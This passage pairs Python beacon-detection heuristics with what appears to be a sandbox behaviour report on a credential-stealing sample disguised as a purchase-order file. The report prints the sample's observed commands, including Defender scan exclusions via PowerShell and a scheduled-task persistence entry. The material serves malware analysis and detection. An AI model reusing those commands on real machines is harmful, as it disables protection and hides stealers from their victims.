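BEACON_UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
             "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
             "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")
# Analyst heuristics (assumptions): short lowercase .biz host, short lowercase path.
DGA_HOST = re.compile(r"^[a-z]{5,16}\.biz$")
BLOB_PATH = re.compile(r"^/[a-z]{3,16}$")
GEOIP_HOSTS = {"reallyfreegeoip.org"}
PREFIX_LEN = 12  # observed: 8 opaque bytes, then a little-endian uint32 length


def parse_request(raw: bytes) -> Dict:
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def declared_payload_length(body: bytes) -> Optional[int]:
    """uint32 at offset 8 of the body prefix, or None if the body is too short."""
    if len(body) < PREFIX_LEN:
        return None
    return struct.unpack_from("<I", body, 8)[0]


def prefix_length_consistent(content_length: int, body: bytes) -> bool:
    """True when that uint32 equals Content-Length minus the 12-byte prefix.

    Holds for all four captured POSTs: 778 -> 766 (0x2fe), 834 -> 822 (0x336).
    """
    declared = declared_payload_length(body)
    return declared is not None and declared == content_length - PREFIX_LEN


def beacon_indicators(req: Dict) -> List[str]:
    """Reasons a parsed request resembles the captured C2 beacons (empty if none)."""
    h = req["headers"]
    reasons = []
    if req["method"] == "POST" and "content-type" not in h:
        reasons.append("POST body without Content-Type")
    if h.get("user-agent") == BEACON_UA:
        reasons.append("User-Agent identical to captured beacons")
    if DGA_HOST.match(h.get("host", "")):
        reasons.append("short lowercase .biz host")
    if BLOB_PATH.match(req["path"]):
        reasons.append("short lowercase path with no extension")
    clen = int(h["content-length"]) if h.get("content-length", "").isdigit() else 0
    if clen and prefix_length_consistent(clen, req["body"]):
        reasons.append("body prefix carries Content-Length minus 12 as LE uint32 at offset 8")
    return reasons


def is_geoip_probe(req: Dict) -> bool:
    """Detect the GET /xml/<ip> lookups vbc.exe made to reallyfreegeoip.org above."""
    host = req["headers"].get("host", "")
    return (req["method"] == "GET" and host in GEOIP_HOSTS
            and re.fullmatch(r"/xml/\d{1,3}(\.\d{1,3}){3}", req["path"]) is not None)


# Constructed from session 13 above: headers verbatim, body = printed 12-byte prefix
# padded with zero bytes to the declared 778 bytes (the real payload is not reproduced).
SESSION_13 = (
    b"POST /rdl HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\n"
    b"Pragma: no-cache\r\nHost: vjaxhpbji.biz\r\nUser-Agent: " + BEACON_UA.encode()
    + b"\r\nContent-Length: 778\r\n\r\n"
    + bytes.fromhex("e2f03355a445a3f8fe020000") + b"\x00" * (778 - PREFIX_LEN)
)
# Constructed from session 0 above (request only).
SESSION_0 = (b"GET /xml/8.46.123.228 HTTP/1.1\r\nHost: reallyfreegeoip.org\r\n"
             b"Connection: Keep-Alive\r\n\r\n")

if __name__ == "__main__":
    for raw in (SESSION_13, SESSION_0):
        req = parse_request(raw)
        print(req["method"], req["path"], beacon_indicators(req),
              "geoip lookup" if is_geoip_probe(req) else "")
```

The length-prefix check is the most specific of the five indicators and survives a change of User-Agent or domain; the others are cheap filters to run first on a large HTTP log.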


Target ID: 0
Start time: 16:44:21
Start date: 28/11/2024
Path: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe"
Imagebase: 0xe20000
File size: 1'432'064 bytes
MD5 hash: 06C13587E9A7AF60860CB6E2C4F3A7B2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1426195581.0000000004A29000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1457423473.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 3
Start time: 16:44:23
Start date: 28/11/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe"
Imagebase: 0x440000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 16:44:23
Start date: 28/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                                                                    Target ID:5
                                                                                                                                                                    Start time:16:44:23
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe"
                                                                                                                                                                    Imagebase:0x440000
                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:6
                                                                                                                                                                    Start time:16:44:23
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:7
                                                                                                                                                                    Start time:16:44:23
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmpE707.tmp"
                                                                                                                                                                    Imagebase:0xb10000
                                                                                                                                                                    File size:187'904 bytes
                                                                                                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:8
                                                                                                                                                                    Start time:16:44:23
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:9
                                                                                                                                                                    Start time:16:44:24
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                                                                    Imagebase:0xff0000
                                                                                                                                                                    File size:2'625'616 bytes
                                                                                                                                                                    MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2696625029.000000000794C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:10
                                                                                                                                                                    Start time:16:44:24
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:1'290'240 bytes
                                                                                                                                                                    MD5 hash:C0525CFD34E032B8DE30555E54329700
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:11
                                                                                                                                                                    Start time:16:44:24
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\alg.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'225'728 bytes
                                                                                                                                                                    MD5 hash:837DCB726B9BB3B6F4FEF3318B9DEEAD
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:12
                                                                                                                                                                    Start time:16:44:24
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                    Commandline:
                                                                                                                                                                    Imagebase:
                                                                                                                                                                    File size:138'056 bytes
                                                                                                                                                                    MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:13
                                                                                                                                                                    Start time:16:44:24
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                    Commandline:
                                                                                                                                                                    Imagebase:
                                                                                                                                                                    File size:174'408 bytes
                                                                                                                                                                    MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:14
                                                                                                                                                                    Start time:16:44:24
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\drivers\AppvVfs.sys
                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                    Commandline:
                                                                                                                                                                    Imagebase:
                                                                                                                                                                    File size:154'952 bytes
                                                                                                                                                                    MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:15
                                                                                                                                                                    Start time:16:44:24
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\AppVClient.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\AppVClient.exe
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'348'608 bytes
                                                                                                                                                                    MD5 hash:A402C4C181FB483490A130C24E7F84A6
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:17
                                                                                                                                                                    Start time:16:44:25
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'242'624 bytes
                                                                                                                                                                    MD5 hash:B184A2D21BE1424241C0CC6F3EE4C667
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:18
                                                                                                                                                                    Start time:16:44:25
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:2'354'176 bytes
                                                                                                                                                                    MD5 hash:D2EAE0B17D8ED7CE90F29615B714FC9B
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:19
                                                                                                                                                                    Start time:16:44:25
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'356'800 bytes
                                                                                                                                                                    MD5 hash:644513105C5FAA8D93951A3690E4014C
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:20
                                                                                                                                                                    Start time:16:44:26
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\msdtc.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\System32\msdtc.exe
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'278'464 bytes
                                                                                                                                                                    MD5 hash:2AF6C23F4C869205351AA38C5DD66D6E
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:21
                                                                                                                                                                    Start time:16:44:26
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'235'968 bytes
                                                                                                                                                                    MD5 hash:4C2FEBAD6B92DDA4F72130648DB37727
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:22
                                                                                                                                                                    Start time:16:44:27
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe
                                                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                                                    File size:1'432'064 bytes
                                                                                                                                                                    MD5 hash:06C13587E9A7AF60860CB6E2C4F3A7B2
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:23
                                                                                                                                                                    Start time:16:44:27
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\perfhost.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\SysWow64\perfhost.exe
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:1'150'976 bytes
                                                                                                                                                                    MD5 hash:3A2A9E48FBD06CF338FA403E33134177
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:24
                                                                                                                                                                    Start time:16:44:27
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\Locator.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\locator.exe
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'141'248 bytes
                                                                                                                                                                    MD5 hash:E970472BE732DDA93E40BA89E643BD45
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:25
                                                                                                                                                                    Start time:16:44:27
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\SensorDataService.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\System32\SensorDataService.exe
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'846'784 bytes
                                                                                                                                                                    MD5 hash:02C2C736D5DC9AC9088C92AFC077A118
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:26
                                                                                                                                                                    Start time:16:44:27
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'146'880 bytes
                                                                                                                                                                    MD5 hash:F35B03B0A56AB372234FE7A532455C96
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:27
                                                                                                                                                                    Start time:16:44:27
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\spectrum.exe
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'455'616 bytes
                                                                                                                                                                    MD5 hash:EA5AC5AC3ADFDE43933DEF676A6978C0
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:28
                                                                                                                                                                    Start time:16:44:28
                                                                                                                                                                    Start date:28/11/2024
                                                                                                                                                                    Path:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    File size:1'511'424 bytes
                                                                                                                                                                    MD5 hash:D09CFE9983E805B17E25ED1928A06826
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

Target ID: 30
Start time: 16:44:28
Start date: 28/11/2024
Path: C:\Windows\System32\TieringEngineService.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\TieringEngineService.exe
Imagebase: 0x140000000
File size: 1'455'616 bytes
MD5 hash: 85B511CA7AB5F39352DEB0D3C0A048DC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 31
Start time: 16:44:28
Start date: 28/11/2024
Path: C:\Windows\System32\AgentService.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\AgentService.exe
Imagebase: 0x140000000
File size: 1'801'216 bytes
MD5 hash: E46CE79404D95E10B788E99FB6C2C36E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 32
Start time: 16:44:28
Start date: 28/11/2024
Path: C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase: 0x7ff7fb730000
File size: 496'640 bytes
MD5 hash: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 33
Start time: 16:44:28
Start date: 28/11/2024
Path: C:\Windows\System32\vds.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\vds.exe
Imagebase: 0x140000000
File size: 1'303'552 bytes
MD5 hash: 0C54A7E73768E6C53E87391113A18ADF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 35
Start time: 16:44:29
Start date: 28/11/2024
Path: C:\Windows\System32\wbengine.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\wbengine.exe"
Imagebase: 0x140000000
File size: 2'164'736 bytes
MD5 hash: ADB425AC8592C2AD75F997794106A5E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 40
Start time: 16:44:36
Start date: 28/11/2024
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YRtQgzFlDnVSru" /XML "C:\Users\user\AppData\Local\Temp\tmp15E7.tmp"
Imagebase: 0xb10000
File size: 187'904 bytes
MD5 hash: 48C2FE20575769DE916F48EF0676A965
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 41
Start time: 16:44:37
Start date: 28/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 42
Start time: 16:44:37
Start date: 28/11/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Imagebase: 0xff0000
File size: 2'625'616 bytes
MD5 hash: 0A7608DB01CAE07792CEA95E792AA866
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000002A.00000002.2688454630.0000000008741000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002A.00000002.2688454630.0000000008741000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000002A.00000002.2688454630.0000000008741000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000002A.00000002.2702940038.0000000009AD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002A.00000002.2702940038.0000000009AD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000002A.00000002.2702940038.0000000009AD0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000002A.00000002.2669298938.0000000007590000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002A.00000002.2669298938.0000000007590000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000002A.00000002.2669298938.0000000007590000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000002.2671075234.000000000791C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000002A.00000002.2671075234.00000000077C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000002A.00000002.2671075234.0000000007741000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited: false


Execution Graph

Execution Coverage: 13.4%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 255
Total number of Limit Nodes: 14
Strings
Memory Dump Source
• Source File: 00000000.00000002.1461531912.0000000009AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9ab0000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID:
• String ID: (oq$4'q$4'q$4'q
• API String ID: 0-2528434116
• Opcode ID: bdb07bde36dc7bd1a790b1401d30081d436fd336f3dd6935a5628d39ae7343e8
• Instruction ID: 58b6c53163dda29e4cbc2d56a4aa2766944f1de04d73e5863dc2552cbd3f5920
• Opcode Fuzzy Hash: bdb07bde36dc7bd1a790b1401d30081d436fd336f3dd6935a5628d39ae7343e8
• Instruction Fuzzy Hash: 44530A74A01219CFDB64CF28C898B9DB7B6BF89710F158599E819AB365CB30ED81CF50

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000000.00000002.1437311328.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5700000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID:
• String ID: Teq$Teq
• API String ID: 0-2938103587
• Opcode ID: e948bb1721190efd243292d1931245f174659d88c333a7bfe57007ca47cbfab5
• Instruction ID: f41028c148ddc222cb201b7159bb66eb69fc427ed3c46f05ce997ce8cb9190c9
